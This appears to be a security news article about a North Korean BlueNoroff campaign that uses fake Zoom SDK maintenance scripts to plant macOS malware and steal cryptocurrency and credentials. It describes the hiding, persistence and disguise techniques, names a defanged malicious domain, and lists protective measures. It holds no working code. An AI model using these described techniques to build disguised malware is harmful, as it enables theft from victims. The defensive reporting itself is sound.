A newly uncovered cyber campaign is targeting organizations across North America, Europe, and the Asia-Pacific by exploiting fake Zoom applications. Cybersecurity experts have traced the operation to BlueNoroff, a notorious North Korean state-backed hacking group affiliated with the Lazarus Group. The campaign’s primary focus is on the gaming, entertainment, and fintech sectors, aiming to infiltrate systems and steal cryptocurrency and other sensitive financial data.
Attack strategy
The attack begins with a seemingly innocuous AppleScript disguised as a routine maintenance operation for Zoom’s software development kit (SDK). However, hidden within the script—buried beneath roughly 10,000 blank lines—are malicious commands that quietly download malware from a counterfeit domain, zoom-tech[.]us.
Once the malware is downloaded, it integrates itself into the system through LaunchDaemon, granting it persistent and privileged access at every system startup. This allows the malware to operate covertly without raising immediate alarms.
The malicious software doesn’t stop there. It fetches additional payloads from compromised infrastructure, presenting them as legitimate macOS components like “icloud_helper” and “Wi-Fi Updater.”
These files are designed with anti-forensics techniques to erase temporary files and conceal their activity, all while maintaining a hidden backdoor for remote control and data exfiltration.
This deceptive approach is particularly dangerous in remote work environments, where minor software issues are often resolved without deep inspection—making it easier for such malware to slip past unnoticed.
Motives behind the attack
BlueNoroff’s intent appears financially driven. The malware specifically searches for cryptocurrency wallet extensions, browser-stored login credentials, and authentication keys. In one known incident dated May 28, a Canadian online gambling platform fell victim to this scheme after its systems were compromised via a fraudulent Zoom troubleshooting script.
Protection Measures for Organizations
Given the growing sophistication of such campaigns, security experts recommend several protective steps:
• Independently verify Zoom participants to ensure authenticity.
• Block suspicious domains like zoom-tech[.]us at the firewall level.
• Deploy comprehensive endpoint protection that can detect hidden scripts and unauthorized daemons.
• Invest in reliable antivirus and ransomware protection, especially for firms with cryptocurrency exposure.
• Use identity theft monitoring services to detect compromised credentials early.
• Train employees to recognize and respond to social engineering attempts.
• Secure digital assets with hardware wallets instead of relying on software-based solutions alone.
